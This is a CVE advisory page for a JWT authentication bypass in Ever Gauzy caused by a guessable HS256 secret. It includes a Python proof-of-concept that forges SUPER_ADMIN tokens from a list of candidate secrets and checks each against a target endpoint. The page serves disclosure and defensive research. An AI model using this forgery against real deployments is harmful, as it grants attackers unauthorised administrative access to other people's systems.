Security Vulnerability Report
CVE-2023-53951 CVSS 9.8 CRITICAL

CVE-2023-53951

Published: 2025-12-19 21:15:51
Last Modified: 2026-04-15 00:35:42

Description

Ever Gauzy v0.281.9 contains a JWT authentication vulnerability that allows attackers to exploit weak HMAC secret key implementation. Attackers can leverage the exposed JWT token to authenticate and gain unauthorized access with administrative permissions.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Ever Gauzy v0.281.9 and earlier versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import jwt
import requests
from datetime import datetime, timedelta

# CVE-2023-53951 PoC - Ever Gauzy JWT authentication bypass
# Release named in the advisory text: Ever Gauzy v0.281.9
# Weakness: the HS256 signing secret is guessable, so tokens can be forged.
#
# HS256 is a symmetric MAC: any party that knows the signing secret can mint a
# token the server will accept, carrying whatever claims it likes. The control
# that matters is therefore the secret itself - a long random value, unique per
# deployment and kept out of source control, never a shipped default.

# Placeholder host; point it only at an instance you operate or are
# authorised to test.
TARGET_URL = "http://target-server:3000"
# NOTE(review): defined but never referenced anywhere below.
API_ENDPOINT = f"{TARGET_URL}/api/auth/login"

# Candidate secrets, tried in order.
# NOTE(review): the page gives no source for these values and the advisory
# text names no specific secret - treat the list as illustrative, not as the
# product's known default.
WEAK_SECRETS = [
    "ever-gauzy-secret",
    "gauzy-jwt-secret",
    "secret",
    "password",
    "EverGauzy2023",
    "default-secret-key",
]


def create_fake_admin_token(secret):
    """Return an HS256 JWT signed with *secret* that claims the SUPER_ADMIN role.

    The claim set is fixed: subject "1", a placeholder e-mail, the role
    SUPER_ADMIN, an issued-at of "now" and an expiry 30 days later.
    """
    # NOTE(review): utcnow() returns a naive datetime and .timestamp() reads a
    # naive value as local time, so iat/exp are shifted by the host's UTC
    # offset on any machine that is not running in UTC.
    issued_at = int(datetime.utcnow().timestamp())
    expires_at = int((datetime.utcnow() + timedelta(days=30)).timestamp())

    claims = {
        "sub": "1",
        # Looks like the page's e-mail obfuscation replaced the original
        # address; the literal is kept exactly as published.
        "email": "[email protected]",
        "role": "SUPER_ADMIN",
        "iat": issued_at,
        "exp": expires_at,
    }
    return jwt.encode(claims, secret, algorithm="HS256")


def test_jwt_forgery():
    """Try each candidate secret against TARGET_URL and stop at the first hit.

    Returns the token the server accepted, or None when every candidate in
    WEAK_SECRETS was rejected.
    """
    print("[*] CVE-2023-53951 - Ever Gauzy JWT Bypass PoC")
    print(f"[*] Target: {TARGET_URL}")

    for secret in WEAK_SECRETS:
        forged_token = create_fake_admin_token(secret)
        print(f"[*] Testing secret: {secret}")
        print(f"[*] Forged token: {forged_token[:50]}...")

        # An authenticated endpoint serves as the check: HTTP 200 means the
        # server verified the signature with this same secret and trusted the
        # claims. For defenders this is the event to alert on - a bearer token
        # accepted that the login flow never issued.
        # NOTE(review): no timeout is passed, so an unresponsive host blocks
        # the script here indefinitely.
        response = requests.get(
            f"{TARGET_URL}/api/user/me",
            headers={"Authorization": f"Bearer {forged_token}"},
        )
        if response.status_code != 200:
            continue

        print(f"[!] SUCCESS! Valid token forged with secret: {secret}")
        print(f"[!] Admin access gained: {response.json()}")
        return forged_token

    print("[-] All weak secrets failed, try other keys")
    return None


if __name__ == "__main__":
    test_jwt_forgery()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53951", "sourceIdentifier": "[email protected]", "published": "2025-12-19T21:15:51.240", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Ever Gauzy v0.281.9 contains a JWT authentication vulnerability that allows attackers to exploit weak HMAC secret key implementation. Attackers can leverage the exposed JWT token to authenticate and gain unauthorized access with administrative permissions."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", 
"vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-347"}]}], "references": [{"url": "https://github.com/ever-co/ever-gauzy", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/51354", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/ever-gauzy-jwt-authentication-weakness-via-hmac-secret", "source": "[email protected]"}]}}